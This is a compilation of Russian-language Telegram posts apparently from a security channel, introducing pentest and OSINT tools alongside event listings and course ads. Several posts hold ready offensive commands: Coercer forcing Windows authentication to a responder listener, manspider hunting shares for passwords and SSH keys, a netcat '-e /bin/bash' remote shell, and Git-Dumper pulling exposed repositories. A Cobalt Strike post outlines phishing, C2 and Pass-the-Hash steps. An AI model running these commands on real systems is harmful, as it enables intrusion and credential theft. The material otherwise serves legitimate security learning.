Как обнаружить скрытые угрозы в вашей сети с помощью Nessus
Функции Nessus
⌨️ Проверяет системы на наличие известных угроз, таких как ошибки конфигурации и устаревшие версии ПО.
⌨️ Работает с Windows, Linux, macOS и сетевыми устройствами.
⌨️ Обновляемая база плагинов позволяет находить даже новые уязвимости.
⌨️ Удобный веб-интерфейс для настройки сканирования и просмотра отчетов.
Пример использования Nessus через CLI
1️⃣ Установка на Linux Nessus
2️⃣ Запуск
Затем перейдите по адресу https://localhost:8834 для настройки через веб-интерфейс.
3️⃣ Аутентификация через CLI
4️⃣ Запуск сканирования
5️⃣ Просмотр результатов
⌨️ Преимущества Nessus
⌨️ Регулярные обновления плагинов позволяют находить новые уязвимости.
⌨️ Поддерживает различные операционные системы и сетевые устройства.
⌨️ Недостатки Nessus
⌨️ Для полной функциональности нужна платная лицензия.
⌨️ При сканировании больших сетей может сильно нагружать ресурсы.
Nessus — это популярный инструмент для сканирования уязвимостей, разработанный компанией Tenable, который направлен на выявление слабых мест в системах и сетях, предотвращая возможные атаки.
Функции Nessus
Пример использования Nessus через CLI
sudo apt install nessus
sudo systemctl start nessusd
Затем перейдите по адресу https://localhost:8834 для настройки через веб-интерфейс.
nessuscli login -u <username> -p <password>
nessuscli scan --name "Network Scan" --targets "192.168.1.0/24" --policy "basic-network-scan"
nessuscli report --scan-id <scan_id>
Please open Telegram to view this post
VIEW IN TELEGRAM
200👍20❤7🔥6
Coercer — скрипт на Python для автоматического принуждения сервера Windows к аутентификации на произвольном компьютере с помощью множества методов. Установка осуществляется с помощью команды
3 режима работы:
⏺️ scan - проверка методов с известными рабочими путями для всех методов;
⏺️ coerce - запуск принудительной аутентификации через все известные методы с известными рабочими путями. В данном режим на своей машине также необходимо запустить responder;
⏺️ fuzz - проверка каждого метода со списком путей эксплойта.
💻 Примеры использования:
Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.
Использование вызовов удалённых процедур на удалённом компьютере, чтобы принудительно выполнить аутентификацию. Для вызова принудительной аутентификации Kerberos вместо адреса хоста нужно указывать его имя. Флагом -l указывается листенер на котором запущен responder.
Прослушивание вызовов удалённых процедур на компьютере с разными путями.
python3 -m pip install coercer
.3 режима работы:
Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.
coercer scan -u user -p pass -t 10.0.0.8 -v
Использование вызовов удалённых процедур на удалённом компьютере, чтобы принудительно выполнить аутентификацию. Для вызова принудительной аутентификации Kerberos вместо адреса хоста нужно указывать его имя. Флагом -l указывается листенер на котором запущен responder.
coercer coerce -u user -p pass -l 10.0.0.80 -t 10.0.0.8 --always-continue
Прослушивание вызовов удалённых процедур на компьютере с разными путями.
coercer fuzz -u user -p pass -t 10.0.0.8 -v
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤7🔥5
mitmproxy2swagger — утилита для автоматического преобразования захваченного трафика через mitmproxy в OpenAPI Specification. Установка происходит через
Использование
1️⃣ Для создания спецификации сначала запускаем mitmweb — веб-интерфейс, встроенный в mitmproxy, с помощью команды
2️⃣ Изучаем наш целевой сайт, самостоятельно переходим на разные эндпоинты, генерируя трафик. Далее необходимо сохранить полученные пакеты в файл и запустить команду:
<api_prefix> Это базовый URL-адрес API, который мы хотим проанализировать.
3️⃣ При выполнении первого прохода в файле схемы появляются эндпоинты API, которые удалось вычленить из файла, с префиксом ignore. Его необходимо удалить и запустить второй проход, тем самым сгенерировав описания конечных точек:
4️⃣ Финальный шаг — скопировать полученное описание в swagger для получения удобочитаемой документации.
‼️ Удобным является поддержка в mitmproxy2swagger формата har. Можно также осуществить взаимодействие с целевым веб-сайтом и экспортировать трафик из браузера DevTools на вкладке Network и проделать шаги 2-4.
pip3 install mitmproxy2swagger
или docker:git clone [email protected]:alufers/mitmproxy2swagger.git
cd mitmproxy2swagger
docker build -t mitmproxy2swagger .
Использование
mitmweb
. Теперь необходимо настроить браузер, чтобы весь трафик проходил через mitmproxy.mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
<api_prefix> Это базовый URL-адрес API, который мы хотим проанализировать.
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥8❤4
🔮Kismet: Магия Wi-Fi анализа для хакеров и исследователей
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
1️⃣ Установка
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
2️⃣ Запуск программы
Откройте терминал и запустите Kismet:
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
3️⃣ Сканирование сетей
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
4️⃣ Анализ пакетов
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
1️⃣ Запустите Kismet и начните сканирование.
2️⃣ Выберите вашу сеть и просмотрите список подключённых устройств.
3️⃣ Проверьте MAC-адреса на наличие незнакомых устройств.
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
sudo apt-get install kismet
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
Откройте терминал и запустите Kismet:
sudo kismet
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥10❤7⚡1
В ближайшие месяцы ИБ-специалисты смогут посетить ряд значимых для комьюнити мероприятий. Представляем подборку из пяти крупных конференций:
1️⃣ ИБ АСУ ТП КВО 2025
➡️ Дата: 4–5 марта 2025 года
➡️ Место: Москва, ул. Вильгельма Пика, 16, Soluxe Hotel Moscow 5*
Мероприятие по защите автоматизированных систем управления технологическими процессами (АСУ ТП). Ведущие специалисты обсудят актуальные угрозы, регуляторные требования и лучшие практики безопасности. 35 докладчиков, 500 делегатов и 700 участников.
🔴 Подробнее
2️⃣ AppSecFest 2025
➡️ Дата: 25 апреля 2025 года
➡️ Место: Алматы, Казахстан
Конференция по безопасности веб- и мобильных приложений, DevSecOps и современным методам защиты ПО. В программе — разбор актуальных атак, мастер-классы и выступления ведущих экспертов.
🔴 Подробнее
3️⃣ ИНФОФОРУМ-Тюмень 2025
➡️ 22–25 апреля 2025
➡️ г. Тюмень, Тюменский Технопарк
Первая межрегиональная конференция по информационной безопасности в Уральском федеральном округе объединит ведущих специалистов в сфере ИБ, представителей госструктур, бизнеса и разработчиков технологий для обсуждения киберугроз, защиты критической инфраструктуры и импортозамещения в отрасли.
🔴 Подробнее
4️⃣ Positive Hack Days (PHDays) 2025
➡️ Дата: 22-24 мая 2025 года
➡️ Место: Москва, "Лужники"
Один из крупнейших форумов по кибербезопасности в России. В программе: кибербитвы, практические воркшопы, презентации от международных и российских экспертов.
🔴 Подробнее
5️⃣ ЦИПР 2025 (Цифровая индустрия промышленной России)
➡️ Дата: 3–6 июня 2025 года
➡️ Место: Нижний Новгород, Россия
Форум о цифровой трансформации и информационной безопасности в промышленности и госсекторе. В центре внимания — импортозамещение, защита критической инфраструктуры и развитие отечественного ИБ-рынка.
🔴 Подробнее
А на какие пойдете вы? Пишите в комментариях!
Мероприятие по защите автоматизированных систем управления технологическими процессами (АСУ ТП). Ведущие специалисты обсудят актуальные угрозы, регуляторные требования и лучшие практики безопасности. 35 докладчиков, 500 делегатов и 700 участников.
Конференция по безопасности веб- и мобильных приложений, DevSecOps и современным методам защиты ПО. В программе — разбор актуальных атак, мастер-классы и выступления ведущих экспертов.
Первая межрегиональная конференция по информационной безопасности в Уральском федеральном округе объединит ведущих специалистов в сфере ИБ, представителей госструктур, бизнеса и разработчиков технологий для обсуждения киберугроз, защиты критической инфраструктуры и импортозамещения в отрасли.
Один из крупнейших форумов по кибербезопасности в России. В программе: кибербитвы, практические воркшопы, презентации от международных и российских экспертов.
Форум о цифровой трансформации и информационной безопасности в промышленности и госсекторе. В центре внимания — импортозамещение, защита критической инфраструктуры и развитие отечественного ИБ-рынка.
А на какие пойдете вы? Пишите в комментариях!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥14❤7
Скачать скомпилированный инструмент можно по ссылке.
snaffler.exe -s -o snaffler.log
Эти правила могут быть очень простыми, например: "если расширение файла — .kdbx, сообщить об этом" или "если путь содержит windows\sxs, прекратить поиск подкаталогов и файлов в этом пути". В правилах также могут использоваться регулярные выражения, которые позволяют выполнять относительно сложные операции сопоставления с образцом.
🪄 Особенность инструмента заключается в объединении нескольких правил в цепочки и создание разветвлённых цепочек. Именно это позволяет Snaffler выполнять довольно глубокую проверку файлов там, где это необходимо, и при этом работать достаточно быстро.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥6
Cobalt Strike: Шахматная доска для хакеров — играем по-крупному
Методика работы Cobalt Strike
Cobalt Strike позволяет создавать и управлять «бэкдорами», через которые злоумышленник может получать доступ к системе.
➡️ Основные шаги работы с фреймворком:
1️⃣ Получение начального доступа - через фишинг или эксплойт скомпрометированная система получает агент Beacon.
2️⃣ Командование через Beacon - Beacon устанавливает скрытный канал связи с командным сервером атакующего.
3️⃣ Расширение контроля - атакующий может использовать различные техники для перемещения по сети (например, Pass-the-Hash) и получения прав администратора.
4️⃣ Эксфильтрация данных - в конце можно скачать конфиденциальные данные или выполнить другие действия по распоряжению.
➡️ Пример использования Cobalt Strike
Представим пентест в организации, где исследуется безопасность сети.
1️⃣ Атакующий отправляет фишинговые письма с вложением, которое, при открытии, заражает компьютер жертвы пейлоадом Beacon.
2️⃣ Beacon связывается с сервером атакующего, давая ему возможность удалённо управлять системой.
3️⃣ Злоумышленник использует Pass-the-Hash, чтобы получить доступ к другим компьютерам в сети и повысить свои привилегии.
4️⃣ В конце пентестеры могут продемонстрировать, как злоумышленник скачивает базу данных с паролями или другую конфиденциальную информацию.
Cobalt Strike — это фреймворк для постэксплуатации, который используется для имитации атак с целью проверки защиты систем. Его цель — помочь профессионалам эффективно воспроизводить реальные угрозы и тестировать защитные механизмы.
Методика работы Cobalt Strike
Cobalt Strike позволяет создавать и управлять «бэкдорами», через которые злоумышленник может получать доступ к системе.
Представим пентест в организации, где исследуется безопасность сети.
Please open Telegram to view this post
VIEW IN TELEGRAM
50👍28❤7🔥7
Sublist3r: Охота на скрытые субдомены
Необходимо установить Sublist3r. Он написан на Python, поэтому важно иметь установленный Python 3.x.
1️⃣ Установка зависимостей
Для начала нужно клонировать репозиторий Sublist3r с GitHub:
2️⃣ Установка зависимостей
Sublist3r использует несколько Python-библиотек. Чтобы установить все зависимости, выполните:
3️⃣ Запуск поиска субдоменов
Теперь, когда все настроено, можно начать сканирование. Для этого нужно указать домен, который вас интересует. Пример:
Команда выполнит поиск субдоменов для домена example.com.
4️⃣ Использование дополнительных опций
Sublist3r имеет множество параметров, например:
- -o — для вывода результатов в файл.
- -p — чтобы указать количество потоков для ускорения поиска.
- -t — для указания времени ожидания.
Пример с несколькими опциями
Запрос найдет субдомены для example.com, выведет их в файл output.txt и использует 50 потоков для более быстрой обработки.
Недостатки Sublist3r
1️⃣ Зависимость от сервисов — блокировки или ограничения могут снизить точность.
2️⃣ Ограниченная точность — не все субдомены индексируются.
3️⃣ Лимиты API — ограничение запросов замедляет работу.
4️⃣ Скорость — зависимость от сторонних сервисов может замедлить поиск.
5️⃣ Отсутствие аналитики — инструмент только находит субдомены, не анализируя их безопасность.
Sublist3r — это инструмент с открытым исходным кодом, предназначенный для поиска субдоменов доменов, помогает обнаружить скрытые поддомены, которые могут быть уязвимыми или предоставлять информацию о структуре веб-приложений.
Необходимо установить Sublist3r. Он написан на Python, поэтому важно иметь установленный Python 3.x.
Для начала нужно клонировать репозиторий Sublist3r с GitHub:
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
Sublist3r использует несколько Python-библиотек. Чтобы установить все зависимости, выполните:
pip3 install -r requirements.txt
Теперь, когда все настроено, можно начать сканирование. Для этого нужно указать домен, который вас интересует. Пример:
python3 sublist3r.py -d example.com
Команда выполнит поиск субдоменов для домена example.com.
Sublist3r имеет множество параметров, например:
- -o — для вывода результатов в файл.
- -p — чтобы указать количество потоков для ускорения поиска.
- -t — для указания времени ожидания.
Пример с несколькими опциями
python3 sublist3r.py -d example.com -o output.txt -p 50
Запрос найдет субдомены для example.com, выведет их в файл output.txt и использует 50 потоков для более быстрой обработки.
Недостатки Sublist3r
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥4❤🔥2
За 2024 год зарегистрировано уже около 29 000 новых CVE. Но далеко не все уязвимости реально используются в атаках, и установить патчи сразу на всё просто невозможно. Как понять, какие угрозы критичны, а какие могут подождать?
Для этого существуют методики приоритизации уязвимостей, которые помогают оценить их опасность и определить, на какие угрозы реагировать в первую очередь.
🔸 CVSS (Common Vulnerability Scoring System) – самая популярная система оценки (от 0 до 10), но в открытом доступе обычно публикуют только базовые метрики, а реальный риск нужно рассчитывать отдельно.
🔸 EPSS (Exploit Prediction Scoring System) – предсказывает вероятность эксплуатации уязвимости в течение ближайших 30 дней, но не учитывает специфические контекстные факторы.
🔸 SSVC (Stakeholder-Specific Vulnerability Categorization) – вместо оценки опасности говорит КАК организация должна реагировать на уязвимость: немедленно исправлять, мониторить или просто отслеживать.
🔸 VISS (Vulnerability Impact Scoring System) – система от Zoom с 100-балльной шкалой, учитывающая влияние уязвимости на платформу, данные и инфраструктуру.
🔸 SSPP (Stakeholder-Specific Patching Prioritization) – методика для управления патчами: анализирует, были ли атаки, есть ли эксплойты и насколько уязвимо ПО в конкретной среде.
💡 Вывод: не существует идеальной системы, но можно комбинировать подходы. Например, CVSS + EPSS позволяет учитывать как технические параметры, так и реальный риск эксплуатации уязвимости.
Какой метод используете вы? Делитесь в комментариях!
➡️Читать статью полностью
Для этого существуют методики приоритизации уязвимостей, которые помогают оценить их опасность и определить, на какие угрозы реагировать в первую очередь.
💡 Вывод: не существует идеальной системы, но можно комбинировать подходы. Например, CVSS + EPSS позволяет учитывать как технические параметры, так и реальный риск эксплуатации уязвимости.
Какой метод используете вы? Делитесь в комментариях!
➡️Читать статью полностью
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤7🔥7
Arjun
Инструмент находит допустимые параметры HTTP с помощью огромного словаря по умолчанию, содержащего 25 890 имен параметров. Чтобы просмотреть этот огромный список, потребуется менее 10 секунд, при этом будет сделано всего 50–60 запросов к цели.
📎 Возможности:
⏺️ Поддерживает запросы GET/POST/POST-JSON/POST-XML;
⏺️ Автоматически обрабатывает ограничения скорости и тайм-ауты;
⏺️ Экспорт результатов в: BurpSuite, текстовый или JSON-файл;
⏺️ Импортировать цели из: BurpSuite, текстового файла или необработанного файла запроса;
⏺️ Может пассивно извлекать параметры из JS или 3 внешних источников.
📌 Установка:
📌 Также установите пакет для Python ratelimit:
Если возникла ошибка о том, что это может навредить вашей системе, используйте ключ --break-system-packages
🌚 Давайте запустим простую проверку:
💡 Чтобы сохранить вывод в файл, используем ключ
💡 Для сохранения файла в текстовом варианте, используем
📎 Исходный код: https://github.com/s0md3v/Arjun
Инструмент находит допустимые параметры HTTP с помощью огромного словаря по умолчанию, содержащего 25 890 имен параметров. Чтобы просмотреть этот огромный список, потребуется менее 10 секунд, при этом будет сделано всего 50–60 запросов к цели.
sudo apt install arjun
pip install ratelimit
arjun -u http://127.0.0.1/
-o
или -oJ
:arjun -u http://127.0.0.1/ -o out.txt
-oT
:arjun -u http://127.0.0.1/ -oT out.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14👍8🔥5
manspider — инструмент предназначенный для сканирования всех общих папок в целевых системах. Поддерживает большое количество типов файлов (pdf, docx, xlsx, pptx, любые текстовые форматы и др.). В качестве цели могут быть указаны IP, hostname, подсети, файлы.
🐍 Установка:
Опционально можно установить несколько зависимостей, чтобы добавить дополнительные возможности синтаксического анализа файлов:
По умолчанию используются следующие настройки:
⏺️ Глубина - 10 (переопределяется через -m)
⏺️ Максимальный размер файла - 10 МБ (переопределяется через -s)
⏺️ Потоки - 5 (переопределяется через -t)
⏺️ Исключены общие ресурсы: C$, IPC$, ADMIN$, PRINT$ (переопределяется через --exclude-sharenames)
🔥 Примеры использования:
Поиск в сети имен файлов, которые могут содержать учетные данные. Через -f передаются имена с использование regex, -d для указания домена. Если предоставленные учётные данные не сработают, инструмент будет пробовать подключение в гостевом режиме, а затем через нулевой сеанс. Найденные файлы автоматически загружаются в $HOME/.manspider/loot.
Поиск документов, содержащих пароли. Через -e указывается расширение файла, а флаг -с указывает на поиск внутри файла с использованием regex.
Поиск SSH-ключей по имени файла.
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
Опционально можно установить несколько зависимостей, чтобы добавить дополнительные возможности синтаксического анализа файлов:
apt install tesseract-ocr
apt install antiword
По умолчанию используются следующие настройки:
Поиск в сети имен файлов, которые могут содержать учетные данные. Через -f передаются имена с использование regex, -d для указания домена. Если предоставленные учётные данные не сработают, инструмент будет пробовать подключение в гостевом режиме, а затем через нулевой сеанс. Найденные файлы автоматически загружаются в $HOME/.manspider/loot.
manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u user -p pass
Поиск документов, содержащих пароли. Через -e указывается расширение файла, а флаг -с указывает на поиск внутри файла с использованием regex.
manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u user -p pass
Поиск SSH-ключей по имени файла.
manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u user -p pass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤4🔥4😁1
Overpass Turbo — веб-инструмент, позволяющий делать сложные запросы к базе данных OpenStreetMap и визуализировать результаты на карте. С ним можно выполнять любые запросы по собственным заданным параметрам поиска и анализировать их на интерактивной карте. Для этого в инструменте используется язык запросов Overpass Query Language. Операторы в нем выполняются один за другим. Каждый опратор должен заканчиваться точкой с запятой, которая является разделителем между ними. В интерфейсе Overpass Turbo в правой части имеется карта, в левой - поле для ввода запросов на языке Overpass QL.
🗺 Перед использованием инструмента необходимо познакомится с OpenStreetMap ("открытая карта улиц") — некоммерческий веб-картографический проект, созданный обычными пользователями в виде подробной свободной и бесплатной географической карты мира. Особенностью данной карты является то, что любой зарегистрированный пользователь может вносить в неё изменения. Разработана в 2004 году. С 2005 по 2022 год количество зарегистрированных участников выросло до 9 млн.
Пользователь может скачать любую часть или всю карту OpenStreetMap для использования в оффлайне. Таким образом, он может использовать скачанные данные для навигации, абсолютно не передавая информацию о местоположении сторонним сервисам.
🖥 Вся информация в OpenStreetMap представлена в виде набора точек, линий и отношений.
⏺️ Nodes — базовые единицы данных с координатами (широта и долгота). Используются для обозначения отдельных объектов, таких как деревья, остановки, колодцы.
⏺️ Ways — последовательности точек, образующие дороги, реки, границы, здания и другие линейные объекты.
⏺️ Relations — объединяют точки, линии и другие отношения в более сложные структуры с некоторыми свойствами, например автобусный маршрут.
Каждый объект снабжен тегами – парами ключ-значение, которые описывают его характеристики. Данные OSM хранятся в виде XML или бинарного формата PBF, оптимизированного для быстрого чтения и обработки.
Вот так выглядит пример запроса в Overpass Turbo, который находит все аптеки в Москве:
Пользователь может скачать любую часть или всю карту OpenStreetMap для использования в оффлайне. Таким образом, он может использовать скачанные данные для навигации, абсолютно не передавая информацию о местоположении сторонним сервисам.
Каждый объект снабжен тегами – парами ключ-значение, которые описывают его характеристики. Данные OSM хранятся в виде XML или бинарного формата PBF, оптимизированного для быстрого чтения и обработки.
Вот так выглядит пример запроса в Overpass Turbo, который находит все аптеки в Москве:
[out:json];
area[name="Москва"]->.searchArea;
(
node["amenity"="pharmacy"](area.searchArea);
);
out center;
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21❤8🔥5😁1
🚩 Новые задания на платформе Codeby Games!
🔎 Категория OSINT — История одного фото
🌍 Категория Веб — Форум предсказателей
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤7👍7
Google продолжает улучшать безопасность своей операционной системы Android, представляя новые механизмы защиты пользователей. Одной из последних разработок стала функция, которая предотвращает изменение критически важных настроек во время телефонных звонков. Это нововведение направлено на борьбу с растущими угрозами, связанными с телефонными мошенниками, которые используют тактики социальной инженерии для установки вредоносных приложений.
Новая функция направлена на противодействие так называемым атакам TOAD (telephone-oriented attack delivery). Этот метод включает:
Примером таких атак является распространение приложений-дропперов, как было выявлено исследователями NCC Group и Национальным центром кибербезопасности Финляндии (NCSC-FI). Злоумышленники с помощью телефонных звонков и SMS обманом заставляли пользователей устанавливать вредоносные программы, такие как Vultr.
Функция блокирует действия, которые мошенники часто требуют от пользователей во время телефонных разговоров:
При попытке изменить эти настройки во время звонка пользователи получают сообщение:
“Мошенники часто просят выполнять такие действия во время телефонных разговоров, поэтому эти действия заблокированы для вашей защиты. Если вас просят сделать это незнакомые люди, это может быть мошенничество.”
Кроме того, функция предотвращает предоставление приложению доступа к функциям доступности, пока звонок не завершится.
Эта функция уже доступна в Android 16 Beta 2, выпущенной на этой неделе.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31🔥11❤10
GoSearch
GoSearch — эффективный и надежный инструмент OSINT, разработанный для обнаружения цифровых следов, связанных с определенным именем пользователя.
🔸 Он быстрый, простой и надежный, позволяя пользователям отслеживать присутствие человека в сети на нескольких платформах.
🔸 GoSearch также интегрирует данные из базы данных HudsonRock Cybercrime Intelligence Database для предоставления информации, связанной с киберпреступностью.
🔸 Он также подключается к базе данных BreachDirectory.org, предлагая доступ к полному списку утечек данных, текстовым и хешированным паролям, связанным с именем пользователя.
🔸 Этот инструмент идеально подходит для тех, кому нужны точные, простые результаты при расследовании онлайн-идентификации.
❕ Главная цель этого инструмента — обеспечить простой и эффективный способ проверки присутствия человека в интернете, выявления его цифрового следа и, в некоторых случаях, даже получения информации о компрометированных данных, связанных с его профилем.
📎 Возможности:
⏺️ Поиск по широкому кругу платформ
⏺️ Интеграция с базами данных утечек
⏺️ Высокая скорость работы
⏺️ Удобство и гибкость
⏺️ После работы программы вывод сохраняется в txt файле
📌 Установка:
Для сборки пакета пишем:
Запуск без сборки:
Для поиска по никнейму используем ключ -u без сборки:
GoSearch — эффективный и надежный инструмент OSINT, разработанный для обнаружения цифровых следов, связанных с определенным именем пользователя.
git clone https://github.com/ibnaleem/gosearch
Для сборки пакета пишем:
go build
sudo cp gosearch /usr/bin
Запуск без сборки:
go run gosearch.go
Для поиска по никнейму используем ключ -u без сборки:
go run gosearch.go -u hacker
Если вы укажите api-ключ от BreachDirectory.org, вывод станет более подробным.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥6❤5😁1
Как провести успешный пентест, взломать AD, скомпрометировать всё, что можно, и выйти из сети заказчика победителем?
Изучите техники и методики атак на инфраструктуру Active Directory на курсе от Академии Кодебай!😎
Наша практическая лаборатория содержит более 30 виртуальных машин, которые вам предстоит сломать. Запись до 13 марта, регистрация — здесь.
Содержание курса:
🔴 Архитектура AD и ее базис
🔴 Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
🔴 Захват и укрепление позиций внутри инфраструктуры
🔴 Применение и анализ популярных эксплоитов
Авторы курса: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Узнайте полную программу курса @Codeby_Academy🚀
Изучите техники и методики атак на инфраструктуру Active Directory на курсе от Академии Кодебай!
Наша практическая лаборатория содержит более 30 виртуальных машин, которые вам предстоит сломать. Запись до 13 марта, регистрация — здесь.
Содержание курса:
Авторы курса: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Узнайте полную программу курса @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍8❤7👏2
Netcat (или nc) — это инструмент, который называют «швейцарским ножом» для сетевых администраторов и хакеров. В чем его секрет и почему он так ценен? Давайте разберемся.
Netcat — это мощный инструмент для системных администраторов и специалистов по безопасности. Он помогает разобраться в происходящем в сети, выявить уязвимости, решать проблемы с подключениями или проводить тестирование на проникновение. Netcat работает с TCP и UDP, прослушивает порты, отправляет и получает данные, а также взаимодействует с удаленными хостами.
Netcat — это инструмент командной строки для установки соединений между хостами, отправки и получения данных. Он полезен для диагностики, тестирования соединений и даже для более сложных атак.
Чтобы проверить, открыт ли порт на удаленном сервере:
nc -zv example.com 80-443
Параметр
-z
проверяет только открытые порты, а -v
выводит информацию о процессе. Вы получите список открытых портов на сервере.Для отправки текстового сообщения или проверки соединения:
nc example.com 80
После подключения можно вручную ввести HTTP-запрос:
GET / HTTP/1.1
Host: example.com
Это вернет HTML-код главной страницы сайта, если сервер правильно обрабатывает запросы.
Netcat также используется для перехвата трафика, создания туннелей и удаленного выполнения команд.
Для организации удаленного доступа без дополнительных программ:
На удаленном сервере:
nc -lvp 4444 -e /bin/bash
Это слушает порт 4444 и запускает оболочку
/bin/bash
. На локальной машине подключаемся:nc remote-server 4444
Теперь у вас есть доступ к командной строке удаленного сервера.
Netcat полезен для диагностики сетевых проблем:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16👍9🔥5😁3🤨2
GAP
Это эволюция оригинального расширения getAllParams для Burp. Он не только находит больше потенциальных параметров для исследования, но и находит потенциальные ссылки для проверки этих параметров и создает целевой список слов для использования при фаззинге.
📌 Установка:
1️⃣ Скачиваем последнюю версию Jython с официального сайта: тут
2️⃣ Скачиваем код GAP: здесь
3️⃣ В директорию GAP-Burp-Extension переносим файл Jython-standalone-x.x.x.jar
4️⃣ Открываем Burp и идём в ➡️ ➡️ я выбрал директорию GAP-Burp-Extension
5️⃣ Открываем терминал в директории GAP-Burp-Extension и вводим команду:
6️⃣ Далее устанавиливаем модуль:
7️⃣ Теперь идём в ➡️
Готово!
Это эволюция оригинального расширения getAllParams для Burp. Он не только находит больше потенциальных параметров для исследования, но и находит потенциальные ссылки для проверки этих параметров и создает целевой список слов для использования при фаззинге.
Extensions
Extension Settings
Python Environment
, задаём диреткорию файла Jython и место куда будут загружаться модули java -jar jython-standalone-x.x.x.jar -m ensurepip
java -jar jython-standalone-x.x.x.jar -m pip install -r requirements.txt
Extensions
Installed
и нажимаем на Add
. Там указываем тип файла и сам GAP.py
Готово!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥5❤4
Если вы увлекаетесь информационной безопасностью, то наверняка слышали про Flipper Zero — карманное устройство для взаимодействия с RFID-картами, пультами, сигнализациями и другими системами. Но знаете ли вы, что его функциональность можно значительно расширить с помощью кастомных прошивок?
В новой статье разберем:
🔸 Где купить Flipper Zero в 2025 году и как не переплатить.
🔸 Как отличить разные версии устройства и что идет в комплекте.
🔸 Что делать после распаковки: настройка, обновление и установка прошивки.
🔸 Сравнение популярных прошивок:
🔴 Официальная — стабильная, но с ограниченным функционалом.
🔴 Xtreme Firmware — расширенные возможности и новые утилиты.
🔴 RogueMaster — максимальный набор инструментов, но не для новичков.
🔴 Unleashed — лучший выбор для работы с радиочастотами.
🔴 DarkFlipper — усиленная безопасность и анонимность.
Какую прошивку выбрать? Какие возможности открывает кастомизация? И чем вообще Flipper Zero хорош? Разбираемся в статье!
📍 Читать обзор полностью
В новой статье разберем:
Какую прошивку выбрать? Какие возможности открывает кастомизация? И чем вообще Flipper Zero хорош? Разбираемся в статье!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍9❤7👎1
Git-Dumper — это инструмент с открытым исходным кодом, предназначенный для извлечения данных из уязвимых .git-репозиториев, которые доступны через веб-серверы. Он полезен для тестирования безопасности и анализа конфигурации серверов.
Для начала необходимо клонировать репозиторий Git-Dumper с GitHub:
git clone https://github.com/arthaud/git-dumper.git
cd git-dumper
Git-Dumper требует установленных Python-библиотек для корректной работы. Установите их командой:
pip3 install -r requirements.txt
Теперь можно приступить к извлечению данных. Для этого укажите URL-адрес уязвимого сайта и папку, в которую будет сохранен репозиторий. Пример:
python3 git-dumper.py http://example.com/.git/ output-folder
Эта команда загрузит .git-репозиторий с сайта http://example.com/.git/ и сохранит его в папке output-folder.
